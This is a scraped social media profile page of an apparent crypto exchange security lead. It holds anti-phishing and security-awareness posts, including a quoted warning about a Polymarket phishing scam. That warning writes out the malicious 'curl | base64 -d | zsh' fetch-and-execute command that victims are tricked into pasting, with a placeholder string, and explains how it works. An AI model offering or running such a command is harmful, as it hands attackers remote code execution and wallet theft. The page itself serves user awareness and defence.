Tom

55 posts

Tom

@TomKuCoin

Head of Security @kucoincom | Protecting your crypto assets 24/7 Critical threat alerts • Anti-scam education • Exchange security insights

Katılım Temmuz 2025

10 Takip Edilen239 Takipçiler

Tom retweetledi

KuCoin@kucoincom·15 Şub

🚨 Hacked? Changing your password is NOT enough. 🚨 If your account is compromised, hackers often maintain access through session tokens, 2FA keys, or cloned Passkeys. A simple password reset won't stop them. The "Reset Everything" Protocol: 🔐 New Password: Use a unique, 12+ character mix. 🛡️ Re-bind 2FA: Delete old keys and start fresh. 🔑 Revoke Passkeys: Delete old ones and recreate. 🚫 Clear Sessions: Force logout from ALL devices. The faster you act, the less the damage. Don't leave the door cracked! 📖 Full Recovery Guide: 🔗kucoin.com/learn/kucoin-g… #SecuritySunday #KuCoin #StaySecure #CryptoSafety

English

129

9.8K

Tom@TomKuCoin·12 Oca

The lesson: AI systems need end-to-end security ownership, not point solutions. The SAIF Risk Map is worth studying: 🔗 saif.google/secure-ai-fram…

English

Tom@TomKuCoin·12 Oca

And critically, it doesn’t stop at deployment: • Runtime → prompt injection, sensitive data disclosure, rogue actions • Monitoring → abuse detection, drift, and incident response

English

Tom@TomKuCoin·12 Oca

One thing I like about Google’s SAIF Risk Map: it frames AI risk as a lifecycle problem, not just a model problem.

Cos(余弦)😶‍🌫️@evilcos

一定要看代码，自从我们捉到几只“摧枯拉朽”的虫子后，对 AI 这玩意就始终保持警惕（当然，玩安全的人本就一直很警惕… 对 AI 安全风险感兴趣的可以看 Google 的这个 SAIF Map： saif.google/secure-ai-fram… 整理的很良心，强烈推荐！

English

8.4K

Tom retweetledi

KuCoin@kucoincom·11 Oca

🎣 PHISHING ALERT: Don't take the bait! ❌ Hackers are constantly evolving, using fake links, emails, calls, and social media to trick you into revealing sensitive info. Protect your crypto! Stay safe with these 3 essential steps: 1️⃣ ALWAYS verify URLs: Manually type kucoin.com/cert or use the official app. 2️⃣ NEVER click suspicious links or share passwords/private keys. 3️⃣ ENABLE your Anti-Phishing Code & verify all "official" contacts via KuCoin's official channels. Read the full guide: kucoin.com/learn/kucoin-g… #SecuritySunday #KuCoin #CryptoSafety #StayAlert #StaySecure

English

10.2K

Tom@TomKuCoin·17 Ara

A new campaign is using fake ChatGPT sessions in Google Ads to deliver AMOS InfoStealer on Macs. 🚨As a reminder for all teams: never run terminal commands from unverified sources—awareness is your first line of defense. 👊 malwarebytes.com/blog/news/2025…

English

7.1K

Tom@TomKuCoin·9 Ara

What is your Safety Score? 🛡️

KuCoin@kucoincom

🔒 Secure More. Earn More. Win $500 USDT! Boost your Safety Score by completing: • Bind Passkey • Google 2FA • Security Code Join the Giveaway: 👉 Follow @kucoincom 👉 Like, RT & drop your score in comments 👉 Submit here: gleam.io/lbdgd/secure-m… 🎁 50 users win $500 USDT! Find your Safety Score: gleam.io/lbdgd/secure-m… Tap Profile → Click Safeguard → Check & upgrade

English

Tom@TomKuCoin·3 Ara

6/ What’s the biggest “shelf-ware” challenge you see in organizations today — tooling, staffing, or process maturity? Comment below👇 #Cybersecurity #Ransomware #Phishing #CryptoSecurity

English

Tom@TomKuCoin·3 Ara

5/ Tools are only one part of the equation. Effective security requires technology + skilled operators + mature processes working in alignment. Source: cybersecuritynews.com/destructive-ak…

English

Tom@TomKuCoin·3 Ara

1/ A recent ransomware case highlights a recurring issue in our industry: shelf-ware. Security isn’t about how advanced the tools are — it’s about how well technology, people, and processes operate together.

English

305

Tom@TomKuCoin·28 Kas

Our hearts are with those affected by the Tai Po fire. 🙏 Standing together with Hong Kong!

BC Wong@BC_KuCoin

Deep respect to Hong Kong’s firefighters who protected lives during the Tai Po fire. KuCoin has made a donation of HKD 2 million to support those who have been impacted — especially the families of the heroes who responded without hesitation. We stand together with Hong Kong. Details: kucoin.com/blog/en-kucoin…

English

165

Tom@TomKuCoin·20 Kas

6/✅ How to stay safe: • Only use the official Polymarket app/website • Never log in through links in comments or DMs • Never run commands you don’t fully understand • Ignore anyone promoting “private markets,” “better odds,” or “exclusive access” • When in doubt, navigate directly — not through a post or message Stay vigilant. Share this thread to protect others. #Polymarket #Web3Security #Phishing #CryptoScam

English

117

Tom@TomKuCoin·20 Kas

5/After “verifying,” a popup appears pretending to be Cloudflare, asking you to verify your activity. This step is engineered to trick you into running a malicious command or interacting with a spoofed verification flow that can compromise your wallet. ⚠️ Never paste commands into your terminal from unknown sources. One action can expose your keys and drain your funds.

English

150

Tom@TomKuCoin·20 Kas

1/ 🚨 SECURITY ALERT: A sophisticated phishing scam is spreading in Polymarket comment threads. Over $500,000 has already been stolen. 🚨 Here is how the scam works:

25usdc@25usdc

People have lost more than $500,000 by being scammed through Polymarket comments. I am posting this to raise awareness of the growing issue. They say: "Why are you not trading on Polymarket private markets? The odds are always much better on there!" Here is how they try to steal your money: They begin by buying both Yes and No shares for a market from two separate accounts - so their comments still appear when the 'Holders' filter is enabled - and then post a URL to their site in an obfuscated form. On that site you're greeted by a clean-looking page with a Polymarket logo and are asked to log in via email. After you verify the email address (yes, they even send you a code), a new window pops up asking you to verify your activity - pretending to be Cloudflare: But when you click 'Copy', something completely different gets copied: curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh You should never paste a command you don't understand into your terminal! The command first decodes the base64-encoded string (a server URL), then fetches a script from that server and immediately executes it. The script can contain anything, and there won't be any pop-up warning. By now, it's probably too late - at this point, there's not much you can do except, with some luck, turning off Wi-Fi. I won't go into detail about what the script does, but there is further obfuscation and additional scripts. In the end, they gather data, log everything on your system, and send a zip back to their server. They then use this data to log into your accounts and steal your money. They are very careful to hide everything, even after the initial obfuscation there is obfuscation at every step. I also noticed they shut down the server that sends payloads and receives logged data when there is no active victim. Here are the scammers' wallet addresses: DGiJqVHdygJ5wRivY9dMJB7TKTFZkoQ9VhhWRHBGtLKb 3hx7UWFABt9QoEKtqeWcDLvMRzbVXmrqHxEne6s7hXwN They appear to switch wallets frequently and have likely already created new ones, but someone might still glean useful information from these addresses. I think the best way to address this is to allow trusted users to review comments or to introduce a downvote system that hides heavily downvoted posts. The simple warning Polymarket currently displays won't be enough, but I'm confident they'll find a good solution.

English

17.2K

Keşfet

@elonmusk @BarackObama @taylorswift13 @cristiano @BillGates @NASA @nikifrancismediavine @katyperry